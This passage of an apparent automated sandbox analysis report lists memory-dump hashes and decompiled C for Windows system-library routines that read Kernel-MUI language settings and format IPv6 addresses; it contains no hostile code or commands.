                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                • Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
                                                • Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                • Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A41D80, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                • Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
                                                • Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                • Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A3FD5C, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                                                • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A3FE24, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                                                • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A3FFFC, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                                                • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A3FF34, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                                                • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A68788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 94%
                                                			E00A68788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E00A68460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E00A4E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E00A6718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E00A68460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E00A4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E00A6718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E00A68460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E00A68460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E00A68460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E00A4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E00A4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E00A6718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E00A4E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E00A42340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E00A5E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E00A4E2A8(_t322,  &_v68, _v16);
								if(E00A65553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E00A5E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E00A4E2A8(_t322,  &_v68, _t236);
								if(E00A65553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E00A4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E00A4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E00A6718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E00A4E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E00A42340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E00A5E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E00A4E2A8(_v12,  &_v68, _v16);
							if(E00A65553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E00A5E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E00A4E2A8(_t322,  &_v68, _t269);
							if(E00A65553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E00A4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E00A4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E00A6718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E00A4E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E00A42340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E00A5E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E00A4E2A8(_v12,  &_v68, _v16);
						if(E00A65553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E00A5E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E00A4E2A8(_t322,  &_v68, _t296);
						if(E00A65553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E00A4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E00A4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                0x00a68788
                                                0x00a68788
                                                0x00a68791
                                                0x00a68794
                                                0x00a68798
                                                0x00a6879b
                                                0x00a6879e
                                                0x00a687a1
                                                0x00a687a4
                                                0x00a687a7
                                                0x00a687aa
                                                0x00a687af
                                                0x00ab1ad3
                                                0x00a68b0a
                                                0x00a68b0d
                                                0x00a68b13
                                                0x00a68b19
                                                0x00a68b1f
                                                0x00a68b25
                                                0x00a68b2b
                                                0x00a68b31
                                                0x00a68b37
                                                0x00a68b3d
                                                0x00a68b46
                                                0x00a68b46
                                                0x00a687c6
                                                0x00a687d0
                                                0x00ab1ae0
                                                0x00ab1ae6
                                                0x00ab1af8
                                                0x00ab1af8
                                                0x00ab1afd
                                                0x00ab1afe
                                                0x00ab1b01
                                                0x00ab1b06
                                                0x00ab1b06
                                                0x00a687d6
                                                0x00a687f2
                                                0x00a687f7
                                                0x00a68807
                                                0x00a6880a
                                                0x00a6880f
                                                0x00a68810
                                                0x00a68813
                                                0x00a68818
                                                0x00a68818
                                                0x00a6882c
                                                0x00a68831
                                                0x00a68838
                                                0x00a68908
                                                0x00a68920
                                                0x00a689f0
                                                0x00a68a08
                                                0x00a68af6
                                                0x00a68af6
                                                0x00a68af8
                                                0x00a68afb
                                                0x00ab1beb
                                                0x00ab1beb
                                                0x00a68b04
                                                0x00ab1bf8
                                                0x00ab1c0e
                                                0x00ab1c13
                                                0x00ab1c16
                                                0x00ab1c16
                                                0x00ab1bf8
                                                0x00000000
                                                0x00a68b04
                                                0x00a68a0e
                                                0x00a68a11
                                                0x00a68a14
                                                0x00a68a15
                                                0x00a68a18
                                                0x00a68a22
                                                0x00a68b59
                                                0x00a68a28
                                                0x00a68a3c
                                                0x00a68a3c
                                                0x00a68a42
                                                0x00ab1bb0
                                                0x00ab1b11
                                                0x00ab1b11
                                                0x00000000
                                                0x00a68a48
                                                0x00a68a51
                                                0x00a68a5b
                                                0x00a68a5e
                                                0x00a68a61
                                                0x00a68a69
                                                0x00a68a69
                                                0x00a68a6d
                                                0x00000000
                                                0x00000000
                                                0x00a68a74
                                                0x00a68a7c
                                                0x00a68a7d
                                                0x00a68a91
                                                0x00a68a93
                                                0x00a68a93
                                                0x00a68a98
                                                0x00a68a9b
                                                0x00a68aa1
                                                0x00a68aa1
                                                0x00a68aa4
                                                0x00a68aaa
                                                0x00a68ab1
                                                0x00a68ac5
                                                0x00a68ac7
                                                0x00a68ac7
                                                0x00a68ac5
                                                0x00a68ace
                                                0x00ab1bc9
                                                0x00ab1bce
                                                0x00ab1bd2
                                                0x00ab1bd2
                                                0x00a68ad8
                                                0x00a68aeb
                                                0x00a68aeb
                                                0x00a68af0
                                                0x00a68af4
                                                0x00000000
                                                0x00a68af4
                                                0x00a68a42
                                                0x00a68926
                                                0x00a68929
                                                0x00a6892c
                                                0x00a6892d
                                                0x00a68930
                                                0x00a68935
                                                0x00a6893a
                                                0x00a68b51
                                                0x00a68940
                                                0x00a68954
                                                0x00a68954
                                                0x00a6895a
                                                0x00ab1b63
                                                0x00000000
                                                0x00a68960
                                                0x00a68969
                                                0x00a68973
                                                0x00a68976
                                                0x00a68979
                                                0x00a6897e
                                                0x00a68981
                                                0x00a68981
                                                0x00a68986
                                                0x00000000
                                                0x00000000
                                                0x00ab1b6e
                                                0x00ab1b74
                                                0x00ab1b7b
                                                0x00ab1b8f
                                                0x00ab1b91
                                                0x00ab1b91
                                                0x00ab1b99
                                                0x00ab1b9c
                                                0x00ab1ba2
                                                0x00ab1ba2
                                                0x00a6898c
                                                0x00a68992
                                                0x00a68999
                                                0x00a689ad
                                                0x00ab1ba8
                                                0x00ab1ba8
                                                0x00a689ad
                                                0x00a689b6
                                                0x00a689c8
                                                0x00a689cd
                                                0x00a689d0
                                                0x00a689d0
                                                0x00a689d6
                                                0x00a689e8
                                                0x00a689e8
                                                0x00a689ed
                                                0x00000000
                                                0x00a689ed
                                                0x00a6895a
                                                0x00a6883e
                                                0x00a68841
                                                0x00a68844
                                                0x00a68845
                                                0x00a68848
                                                0x00a6884d
                                                0x00a68852
                                                0x00a68b49
                                                0x00a68858
                                                0x00a6886c
                                                0x00a6886c
                                                0x00a68872
                                                0x00ab1b0e
                                                0x00000000
                                                0x00a68878
                                                0x00a68881
                                                0x00a6888b
                                                0x00a6888e
                                                0x00a68891
                                                0x00a68896
                                                0x00a68899
                                                0x00a68899
                                                0x00a6889e
                                                0x00000000
                                                0x00000000
                                                0x00ab1b21
                                                0x00ab1b27
                                                0x00ab1b2e
                                                0x00ab1b42
                                                0x00ab1b44
                                                0x00ab1b44
                                                0x00ab1b4c
                                                0x00ab1b4f
                                                0x00ab1b55
                                                0x00ab1b55
                                                0x00a688a4
                                                0x00a688aa
                                                0x00a688b1
                                                0x00a688c5
                                                0x00ab1b5b
                                                0x00ab1b5b
                                                0x00a688c5
                                                0x00a688ce
                                                0x00a688e0
                                                0x00a688e5
                                                0x00a688e8
                                                0x00a688e8
                                                0x00a688ee
                                                0x00a68900
                                                0x00a68900
                                                0x00a68905
                                                0x00000000
                                                0x00a68905

                                                APIs
                                                Strings
                                                • Kernel-MUI-Language-Allowed, xrefs: 00A68827
                                                • Kernel-MUI-Language-Disallowed, xrefs: 00A68914
                                                • WindowsExcludedProcs, xrefs: 00A687C1
                                                • Kernel-MUI-Number-Allowed, xrefs: 00A687E6
                                                • Kernel-MUI-Language-SKU, xrefs: 00A689FC
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: _wcspbrk
                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                • API String ID: 402402107-258546922
                                                • Opcode ID: 208b22777f0f102398881cc315b81a742f43ec2479715bf5b2b875e574178b3b
                                                • Instruction ID: 5ab7665fc7cde54beed12ebbd0d115cb4ab6791bda4bcc5c262023b1d487ed70
                                                • Opcode Fuzzy Hash: 208b22777f0f102398881cc315b81a742f43ec2479715bf5b2b875e574178b3b
                                                • Instruction Fuzzy Hash: 11F1F5B6D00209EFCF11DFA4CA859EEBBB8FF08300F14456AE505A7211EB359E45DB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A813CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 38%
                                                			E00A813CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E00A77707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0xa42926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E00A77707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0xa49cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E00A77707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E00A77707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E00A77707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E00A77707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                0x00a813d5
                                                0x00a813d9
                                                0x00a813dc
                                                0x00a813de
                                                0x00a813e1
                                                0x00a813e8
                                                0x00a813ee
                                                0x00aae8fd
                                                0x00000000
                                                0x00aae921
                                                0x00aae921
                                                0x00aae928
                                                0x00aae982
                                                0x00aae98a
                                                0x00000000
                                                0x00aae99a
                                                0x00aae99e
                                                0x00aae9a3
                                                0x00aae9a8
                                                0x00aae9b9
                                                0x00aae978
                                                0x00000000
                                                0x00aae978
                                                0x00aae98a
                                                0x00aae92a
                                                0x00aae931
                                                0x00aae944
                                                0x00aae944
                                                0x00aae950
                                                0x00aae954
                                                0x00aae959
                                                0x00aae95e
                                                0x00aae963
                                                0x00aae970
                                                0x00000000
                                                0x00aae975
                                                0x00aae93b
                                                0x00aae980
                                                0x00000000
                                                0x00aae980
                                                0x00aae942
                                                0x00aae94b
                                                0x00000000
                                                0x00aae94b
                                                0x00000000
                                                0x00aae942
                                                0x00a813f4
                                                0x00a813f4
                                                0x00a813f9
                                                0x00a813fc
                                                0x00a813ff
                                                0x00a81406
                                                0x00aae9cc
                                                0x00aae9d2
                                                0x00aae9d2
                                                0x00aae9cc
                                                0x00a8140c
                                                0x00a81411
                                                0x00a81431
                                                0x00a8143a
                                                0x00a8143c
                                                0x00a8143f
                                                0x00a8143f
                                                0x00a81442
                                                0x00a81447
                                                0x00a814a8
                                                0x00a814ac
                                                0x00aae9e2
                                                0x00aae9e7
                                                0x00aae9ec
                                                0x00aaea05
                                                0x00aaea05
                                                0x00000000
                                                0x00a81449
                                                0x00000000
                                                0x00a81449
                                                0x00a8144c
                                                0x00a81459
                                                0x00a81462
                                                0x00a81469
                                                0x00a8146a
                                                0x00a81470
                                                0x00a81473
                                                0x00a81476
                                                0x00a81476
                                                0x00a81490
                                                0x00a81495
                                                0x00a8138e
                                                0x00a81390
                                                0x00a81397
                                                0x00a81398
                                                0x00a81399
                                                0x00a813a1
                                                0x00a813a4
                                                0x00a813a4
                                                0x00a81498
                                                0x00a8149c
                                                0x00a8149f
                                                0x00a814a2
                                                0x00000000
                                                0x00000000
                                                0x00a814a4
                                                0x00000000
                                                0x00a814a4
                                                0x00a81413
                                                0x00a81415
                                                0x00a81416
                                                0x00a81419
                                                0x00a8141c
                                                0x00a81422
                                                0x00a813b7
                                                0x00a813bc
                                                0x00a813bf
